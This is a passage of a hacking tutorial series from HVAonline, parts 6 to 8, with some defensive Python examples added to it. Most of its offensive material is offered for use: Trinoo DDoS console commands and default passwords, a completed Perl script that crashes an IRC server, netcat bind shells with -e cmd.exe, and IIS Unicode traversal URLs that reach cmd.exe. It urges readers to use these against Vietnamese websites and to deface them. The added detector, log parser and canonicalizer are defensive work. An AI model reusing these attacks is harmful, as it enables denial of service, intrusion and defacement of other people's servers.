Escape character is '^]'.
kwijibo
Connection closed by foreign host.      <== you typed a wrong password

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo >                                <== you are in the trinoo console

_ Some default passwords:

l44adsl: password of the trinoo daemon.
gorave: password of the trinoo master server at startup.
betaalmostdone: the shared remote-control password of the trinoo master.
killme: password the trinoo master requires for the "mdie" command.

_ Some commands for controlling the master server ("broadcasts" is what trinoo calls its daemons):

CODE
die             Shutdown.
quit            Log off.
mtimer N        Set the DoS timer; N is from 1 to 1999 seconds.
dos IP          Attack the given IP address.
mdie pass       Disable all broadcasts, if the password is correct. A command ("d1e l44adsl") is sent to the broadcasts to shut them down. A separate password is required for this.
mping           Send a ping command ("png l44adsl") to the broadcasts.
mdos            Send a multi-DoS command ("xyz l44adsl 123:ip1:ip2") to the broadcasts.
info            Show information about Trinoo.
msize           Set the buffer size of the packets sent during the DoS.
nslookup host   Look up host, as seen from the machine the master is running on.
usebackup       Switch to the backup broadcast file created by the killdead command.
bcast           List all broadcasts that can be used.
help [cmd]      List the commands.
mstop           Stop the DoS attacks.

_ Some commands for controlling the Trinoo daemons:

CODE
aaa pass IP              Attack the given IP address: send UDP packets to random UDP ports (0-65534) of that IP for a set period, 120 seconds by default, or 1 to 1999 seconds.
bbb pass N               Set the time limit for DoS attacks.
shi pass                 Send the string "*HELLO*" to the list of master servers compiled into the program, on port 31335/UDP.
png pass                 Send the string "PONG" to the master that issued the command, on port 31335/UDP.
die pass                 Shut down Trinoo.
rsz N                    Size of the buffer used for the attack, in bytes.
xyz pass 123:ip1:ip3     Attack several targets at once.

(Based on the guide by Binhnx2000.) There is a lot more code on DoS techniques out there; take the time to look into it. But do not attack things at random, least of all HVA's server: it will not get you anywhere and your nick will be locked.
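The commands and ports above are also exactly what a defender looks for. The following is an added example (not part of the HVA text or of Trinoo): it labels packets that look like Trinoo control traffic and counts the random-port UDP spray the "aaa" command produces. The ports 27665/tcp and 31335/udp come from the text; 27444/udp (master to daemon) is from Dittrich's 1999 Trinoo analysis, not from this page. The packet feed is constructed for the example.

```python
"""Spot Trinoo control traffic and its UDP flood in a simple packet feed."""
from collections import defaultdict
import re

MASTER_CONSOLE_TCP = 27665   # attacker -> master (the telnet session above)
DAEMON_CMD_UDP = 27444       # master -> daemon (Dittrich's analysis, not this page)
DAEMON_REPORT_UDP = 31335    # daemon -> master (*HELLO*, PONG)
DAEMON_COMMANDS = re.compile(r"^(aaa|bbb|shi|png|d1e|rsz|xyz)\b")
DEFAULT_PASSWORDS = ("l44adsl", "gorave", "betaalmostdone", "killme")


def classify_packet(pkt: dict):
    """Label one packet (keys: proto, src, dst, dport, payload); None if it looks benign."""
    proto, dport, payload = pkt["proto"], pkt["dport"], pkt["payload"]
    if proto == "tcp" and dport == MASTER_CONSOLE_TCP:
        return "trinoo master console"
    if proto == "udp" and dport == DAEMON_REPORT_UDP and payload.startswith(("*HELLO*", "PONG")):
        return "trinoo daemon -> master"
    if proto == "udp" and dport == DAEMON_CMD_UDP and DAEMON_COMMANDS.match(payload):
        return "trinoo master -> daemon"
    # Rebuilt copies often change the ports but keep the compiled-in passwords.
    if any(pw in payload for pw in DEFAULT_PASSWORDS):
        return "trinoo default password in payload"
    return None


def udp_flood_sources(pkts, min_ports: int = 50) -> dict:
    """The 'aaa' flood sprays UDP at random ports: count distinct dports per (src, dst)."""
    ports = defaultdict(set)
    for p in pkts:
        if p["proto"] == "udp":
            ports[(p["src"], p["dst"])].add(p["dport"])
    return {pair: len(ps) for pair, ps in ports.items() if len(ps) >= min_ports}


def _pkt(proto, src, dst, dport, payload=""):
    return {"proto": proto, "src": src, "dst": dst, "dport": dport, "payload": payload}


# Constructed feed: one packet of each control type, one benign DNS query,
# then 100 flood packets from a daemon (10.0.0.2) to the victim (10.0.0.9).
SAMPLE_PACKETS = [
    _pkt("tcp", "192.0.2.10", "10.0.0.1", 27665, "betaalmostdone\r\n"),
    _pkt("udp", "10.0.0.2", "10.0.0.1", 31335, "*HELLO*"),
    _pkt("udp", "10.0.0.1", "10.0.0.2", 27444, "aaa l44adsl 10.0.0.9"),
    _pkt("udp", "10.0.0.3", "10.0.0.53", 53, "\x12\x34\x01\x00"),
] + [_pkt("udp", "10.0.0.2", "10.0.0.9", 1000 + i, "\x00" * 1000) for i in range(100)]


def report(pkts):
    """(list of (src, dst, label) for control packets, dict of flooding (src, dst) pairs)."""
    control = []
    for p in pkts:
        label = classify_packet(p)
        if label:
            control.append((p["src"], p["dst"], label))
    return control, udp_flood_sources(pkts)


if __name__ == "__main__":
    control, floods = report(SAMPLE_PACKETS)
    for src, dst, label in control:
        print(f"{src} -> {dst}: {label}")
    for (src, dst), n in floods.items():
        print(f"{src} -> {dst}: {n} distinct UDP ports hit (flood)")
```

Three of the four handcrafted packets are labelled, the DNS query is not, and the 100-packet spray shows up as one flooding pair. Tune `min_ports` to your network; a real DNS or NTP server legitimately answers many source ports, which is why the counter keys on the destination port only.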

End of part 6. He he.

Basics of becoming a hacker - Part 7

42.) DoS technique against WircSrv IRC Server v5.07:


WircSrv IRC is a popular IRC server on the Internet. It crashes when a hacker sends it a packet larger than the allowed size (65000 characters) on port 6667. You can do this by telnetting to WircSrv on port 6667. On Unix:

$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
Escape character is '^]'.
[buffer]

On Windows it is the same:

telnet irc.example.com 6667

Note: [buffer] is a data packet of 65000 characters.
However, we can crash it much more simply with the following code (look at the code and decode the commands in it yourself; that is one way to train the reflexes a hacker needs when doing research. So, let's analyze it at a basic level):

CODE
#!/usr/bin/perl        # <== tells us this code is run by perl
use Getopt::Std;
use Socket;
getopts('s:', \%args);
if (!defined($args{s})) { &usage; }
my ($serv, $port, $foo, $number, $data, $buf, $in_addr, $paddr, $proto);
$foo = "A";                  # the filler byte (the text calls it a NOP; it is just padding)
$number = "65000";           # how many of them
$data .= $foo x $number;     # the result of $foo repeated $number times
$serv = $args{s};            # the remote server, from the -s option
$port = 6667;                # the remote port, 6667 by default
$buf = "$data";
$in_addr = (gethostbyname($serv))[4];
# The page's listing stops at the line above. What follows is the usual completion
# implied by the variables declared in my(): build the address, connect, send, close.
$paddr = sockaddr_in($port, $in_addr);
$proto = getprotobyname('tcp');
socket(S, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(S, $paddr) or die "connect: $!";
send(S, $buf, 0);
close(S);
sub usage { print "usage: $0 -s <server>\n"; exit; }

Basics of becoming a hacker - Part 8


47.) Tools you need for web hacking:

Professional hackers have no need for these tools: they install the same software version the target site runs on their own machine and test it there. But for those just starting out these tools are essential; use them a few times and you will learn how to combine them to find holes in target sites as quickly as possible. Here is what you need on your working machine:

Tool 1: A proxy, to hide your IP and get past firewalls when needed (how to set one up was shown in part 7; go back and read it).

Tool 2: A shell account; this is really important for you. A good shell account lets you run the main programs such as nslookup, host, dig, ping, traceroute, telnet, ssh, ftp, ... and it must have GCC installed (very important for compiling exploits written in C), e.g. MinGW, Cygwin and other dev tools. A shell account is something like a DOS shell, but with many more commands and features. Normally when you install Unix you get a shell account; if you do not install Unix you can register a free shell account online, or if someone who runs Unix sets one up for you, you can log in with telnet (Start -> Run -> type Telnet) to use it. Some places where you can register a free shell account:
http://www.freedomshell.com/
http://www.cyberspace.org/shell.html
http://www.ultrashell.net/

Tool 3: NMAP is a fast and powerful port scanner. It can scan across wide networks and is particularly good against a single host. NMAP shows you which services are running on the server (services / ports: web server, FTP server, POP3, ...), what operating system the server runs, what kind of firewall it uses, and much more. NMAP supports most scanning techniques: ICMP (ping sweep), IP protocol, Null scan, TCP SYN (half open), ... NMAP is rated the number one tool of hackers and network administrators worldwide. Everything about NMAP is at http://www.insecure.org/.

Tool 4: Stealth HTTP Security Scanner is an excellent security scanner for Win32. It can scan for more than 13000 security holes and identify 5000 different exploits.

Tool 5: IntelliTamper shows the structure of a website, which directories and files it contains; it can even list password-protected directories and files. Very handy for hacking a website, since before you hack a site you need some information about its admin and about the site.

Tool 6: Netcat reads and writes data across the network over TCP or UDP. You can use Netcat directly or drive it from another script. Netcat counts as an exploitation tool because it can set up a link between you and the server for reading and writing data (once Netcat is running on a vulnerable server, of course). Everything about Netcat is at http://www.l0pht.com/.

Tool 7: ActivePerl runs Perl files (*.pl), and exploits are often written in Perl. It is also used to execute commands through *.pl files.

Tool 8: Linux is the operating system almost all hackers use.

Tool 9: L0phtCrack is the number one tool for cracking Windows NT/2000 passwords.

I showed you how to download in earlier parts, so I will not repeat it here. When downloading pay attention to the version numbers: take the one with the highest number, it will have features the earlier versions lack. If you download them and do not know how to use them, look for the how-to posts in the forum box; if you still cannot find anything, post a question and the other members will answer you.

48.) Netcat guide:

a.) Introduction: Netcat is an indispensable tool if you want to hack a website; it is very powerful and convenient, so you need to know a bit about it.

b.) Compiling:
_ For the Linux version of Netcat you have to compile it before use.
- edit netcat.c with vi: vi netcat.c
  + find the line res_init(); in main() and put two slashes in front of it: //res_init();
  + add the following two lines to the #define section (at the top of the file):

#define GAPING_SECURITY_HOLE
#define TELNET

- compile: make linux
- test it: ./nc -h
- if you want to run Netcat as nc instead of ./nc, just add ":." to the PATH variable in ~/.bashrc:
PATH=/sbin:/usr/sbin:...:.

_ The Windows version needs no compiling; it ships as the binary nc.exe. Just unpack and run it.

c.) Netcat options:

_ Netcat runs from the command line. Run nc -h to see the parameters:

CODE
C:\> nc -h
connect to somewhere: nc [-options] hostname port [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d            detach Netcat from the command window (console); Netcat then runs stealthily, with no entry on the Taskbar
-e prog       execute the program prog, usually used in listen mode
-h            this help
-i secs       delay secs seconds between lines of data sent
-l            put Netcat in listen mode, waiting for inbound connections
-L            make Netcat listen "persistently": it listens again after each connection ends (Windows build only)
-n            numeric-only IP addresses, e.g. 192.168.16.7; Netcat will not query DNS
-o file       write a hex dump of the traffic to file
-p port       local port number
-r            have Netcat pick ports at random
-s addr       use addr as the source address (the text calls this spoofing; it only works with an address the host actually has)
-t            answer TELNET option negotiation. When you telnet to a telnet daemon (telnetd), telnetd asks your telnet client for extra information such as the TERM and USER environment variables. With -t netcat satisfies telnetd without sending that information.
-u            use UDP (netcat uses TCP by default)
-v            show details about the current connection
-vv           show even more detail
-w secs       set the timeout for each connection to secs seconds
-z            zero-I/O mode, normally used for port scanning


Netcat supports port ranges. The syntax is port1-port2. For example, 1-8080 means 1, 2, 3, ..., 8080.

d.) Learning Netcat through examples:

_ Grabbing a web server's banner:

Example: nc to 172.16.84.2, port 80

CODE
C:\> nc 172.16.84.2 80
HEAD / HTTP/1.0          (press Enter twice here)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html

To see details about the connection, use -v (-vv gives even more detail):

C:\> nc -vv 172.16.84.1 80

CODE
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: "0-cec-3899eaea"
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK

If you want to keep a log, use -o. For example:

nc -vv -o nhat_ki.log 172.16.84.2 80

Open nhat_ki.log to see what it records:

CODE
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 #  GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb 
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f #  3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a                                  # l....

The < sign means the server sent it to netcat
The > sign means netcat sent it to the server
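The -o dump is a useful artefact in its own right: a recorded exchange you can parse later instead of squinting at the hex. Here is an added example (not part of the HVA text or of netcat) that reads a log in this format, reassembles the two byte streams from the offsets and direction markers, and pulls the HTTP status and Server header back out. The log text is constructed to match the format shown above, with a shortened reply.

```python
"""Parse a netcat -o hex-dump log and recover the HTTP exchange it recorded."""
import re

# "<" or ">", 8-digit hex offset, 1..16 hex bytes, then "#" and the ASCII column.
_LINE = re.compile(r"^([<>]) ([0-9a-fA-F]{8}) ((?:[0-9a-fA-F]{2} ?)+)\s*#")


def parse_nc_log(text: str) -> dict:
    """Reassemble both streams: '<' server -> netcat, '>' netcat -> server."""
    streams = {"<": bytearray(), ">": bytearray()}
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue                      # not a dump line (blank, banner, etc.)
        direction, offset, hexpart = m.group(1), int(m.group(2), 16), m.group(3)
        buf = streams[direction]
        if offset != len(buf):            # -o offsets are per direction and contiguous
            raise ValueError(f"gap in '{direction}' stream at offset {offset:#x}")
        buf += bytes.fromhex(hexpart)
    return {k: bytes(v) for k, v in streams.items()}


def parse_http_response(raw: bytes):
    """Split a raw HTTP/1.x reply into (status code, {header name: value})."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def banner_from_log(text: str) -> str:
    """What you would read off the screen: the Server header of the reply."""
    _status, headers = parse_http_response(parse_nc_log(text)["<"])
    return headers.get("server", "")


# Constructed log in the -o layout: a HEAD request and a shortened reply.
SAMPLE_LOG = """\
> 00000000 48 45 41 44 20 2f 20 48 54 54 50 2f 31 2e 30 0d # HEAD / HTTP/1.0.
> 00000010 0a 0d 0a                                        # ...
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f # .Server: Apache/
< 00000020 31 2e 33 2e 32 30 20 28 57 69 6e 33 32 29 0d 0a # 1.3.20 (Win32)..
< 00000030 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 # Content-Length: 
< 00000040 33 33 30 38 0d 0a 0d 0a                         # 3308....
"""

if __name__ == "__main__":
    streams = parse_nc_log(SAMPLE_LOG)
    print("request :", streams[">"])
    print("status  :", parse_http_response(streams["<"])[0])
    print("server  :", banner_from_log(SAMPLE_LOG))
```

The parser trusts the offsets rather than the order of lines, so a log whose halves were cut and pasted out of sequence is rejected instead of silently producing garbage; the ASCII column after "#" is ignored because netcat replaces unprintable bytes with dots there.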

_ Port scanning:
Run netcat with the -z option. To scan faster, add -n so netcat does not query DNS. Example: scan TCP ports 1 to 500 of host 172.16.106.1

CODE
[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open

If you need to scan UDP ports, use -u

CODE
[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open

_ Turning Netcat into a trojan:
On the victim's machine, start netcat in listen mode with the -l (listen) option, -p port to set the port number to listen on, and -e to make netcat run a program when a connection comes in, usually a command shell: cmd.exe (on NT) or /bin/sh (on Unix). Example:

CODE
E:\> nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error

On the attacking machine you simply use netcat to connect to the victim on that port, e.g. 8080

CODE
C:\> nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

E:\> cd test
cd test
E:\test> dir /w
dir /w
 Volume in drive E has no label.
 Volume Serial Number is B465-452F
 Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
 6 File(s) 262,499 bytes
 2 Dir(s) 191,488,000 bytes free
C:\test> exit
exit
sent 20, rcvd 450: NOTSOCK

As you can see, we can do what we like on the victim's machine; with just a few basic commands we have taken over the other side's computer. Read on:

CODE
E:\> nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...
??

With Netcat for Windows in particular you can listen on a port that is already being listened on. Just specify the source address with -s. Example:

CODE
netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING
nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53     -> listen on port 53, which is already in use
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163
??

On Windows NT, putting Netcat in listen mode does not require Administrator rights; logging in with an ordinary username is enough to run Netcat.
Note: you cannot run netcat with ... -u -e cmd.exe ... or ... -u -e /bin/sh ... because netcat will not work correctly that way. If you want a UDP shell on Unix, use udpshell instead of netcat.

(Based on the post by Vicky.)

49.) Hacking IIS server 5.0:

_ All IIS server versions up to 5.0 have holes we can exploit; since almost everyone now runs IIS server 5.0, I will not go into the holes of the earlier versions. Now I will show you how to hack with ActivePerl and IE; you can use this on Vietnamese websites, very many of which have this hole. Let's begin.

_ First, download ActivePerl and Unicode.pl.

_ Use telnet to find out whether the site we are attacking runs IIS server 5.0 (the Server: header of the reply names the software):

CODE
telnet <site name> 80
HEAD / HTTP/1.0          (then press Enter twice)

If that does not tell us what the target is running, replace port 80 with other ports such as 8080, 81, 8000, 8001, etc.

_ Once you have identified the target, go to DOS and type:

CODE
perl unicode.pl
Host: (type the address of the server you want to hack)
Port: 80 (or 8080, 81, 8000, 8001, whichever port you telnetted to above).

_ You will see a list of holes (programmed into Unicode.pl) like this:

CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2] /scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4] /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11] /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

You will see all of these holes only if the victim's site has all of them; if the victim's server has only holes 13 and 17, the result will show only lines 13 and 17. Suppose the result tells me the victim's site has holes 3 and 7; I then open IE and type the matching string into the Address bar:

http://www.xxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+   <== the hole on line 3

or

http://www.xxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+   <== the hole on line 7

_ At this point you are inside the victim's server; use DOS commands to dig out the information in there. Websites normally live in the directory \inetpub\wwwroot; go there and simply replace index.html with your own hack page. That is all there is to it, don't be so scared.
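A note on that list before the defensive side: it mixes working encodings with junk. Entries like %c1%pc, %c0%9v, %c0%qf and %c1%8s contain characters that are not hex digits, and in %c1%1c the second byte is not a UTF-8 continuation byte, so no decoder turns them into a path separator; the forms that work are the overlong UTF-8 encodings of "/" (%c0%af, %e0%80%af, %f0%80%80%af and the 5- and 6-byte variants) and of "\" (%c1%9c). The following added example (not part of the HVA text or of Unicode.pl) does what the vulnerable IIS decoder did, percent-decode and then accept overlong UTF-8, and flags requests whose canonical path climbs out of the web root. The log lines are constructed in a W3C-extended-like layout (date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query, sc-status).

```python
"""Canonicalize request paths the way the Unicode bug forced IIS to, then flag
requests that escape the web root."""
import re

_PCT = re.compile(rb"%([0-9A-Fa-f]{2})")


def percent_decode(path: str) -> bytes:
    """Decode %XX only where XX really is hex; '%c1%pc' stays literal."""
    return _PCT.sub(lambda m: bytes([int(m.group(1), 16)]), path.encode("latin-1", "replace"))


def decode_utf8_overlong(data: bytes) -> str:
    """UTF-8 decode that ACCEPTS overlong forms (the bug). Bytes that do not form a
    well-shaped sequence are passed through one at a time instead of raising."""
    out, i, n = [], 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        if 0xC0 <= b <= 0xDF:   length, cp = 2, b & 0x1F
        elif 0xE0 <= b <= 0xEF: length, cp = 3, b & 0x0F
        elif 0xF0 <= b <= 0xF7: length, cp = 4, b & 0x07
        elif 0xF8 <= b <= 0xFB: length, cp = 5, b & 0x03   # obsolete 5-byte form (%f8...)
        elif 0xFC <= b <= 0xFD: length, cp = 6, b & 0x01   # obsolete 6-byte form (%fc...)
        else:
            out.append(chr(b)); i += 1; continue
        tail = data[i + 1:i + length]
        if len(tail) == length - 1 and all(0x80 <= t <= 0xBF for t in tail):
            for t in tail:
                cp = (cp << 6) | (t & 0x3F)
            out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
            i += length
        else:                       # e.g. %c1%1c: 0x1c is not a continuation byte
            out.append(chr(b)); i += 1
    return "".join(out)


def canonical_path(raw: str) -> str:
    return decode_utf8_overlong(percent_decode(raw))


def escapes_webroot(path: str) -> bool:
    """Walk the segments; a '..' at depth 0 means the request left the web root."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            if depth == 0:
                return True
            depth -= 1
        elif seg and seg != ".":
            depth += 1
    return False


# Constructed sample: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2000-10-17 12:00:01 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2000-10-17 12:00:02 10.0.0.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 200
2000-10-17 12:00:03 10.0.0.7 GET /scripts/../index.html - 200
2000-10-17 12:00:04 10.0.0.5 GET /scripts/..%c1%pc../winnt/system32/cmd.exe /c+dir 404
"""


def scan_log(text: str):
    """(client ip, raw stem, canonical stem) for every request that escapes the root."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        ip, stem = fields[2], fields[4]
        canon = canonical_path(stem)
        if escapes_webroot(canon):
            hits.append((ip, stem, canon))
    return hits


if __name__ == "__main__":
    for ip, raw, canon in scan_log(SAMPLE_LOG):
        print(f"{ip}: {raw} -> {canon}")
```

Lines 1 and 2 are flagged (the %c0%af and %c1%9c forms both canonicalize to "/scripts/../../winnt/..."), line 3 is a harmless "../" that stays inside the root, and line 4 with %c1%pc is not flagged because it never decodes to a separator, which is the same reason it does not work as an attack. Matching on the literal string "%c0%af" would miss the %e0%80%af and %fc%80%80%80%80%af variants; canonicalizing first catches all of them with one rule.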

GOOD LUCK!!!

(End of part 8)
Anhdenday
HVAonline
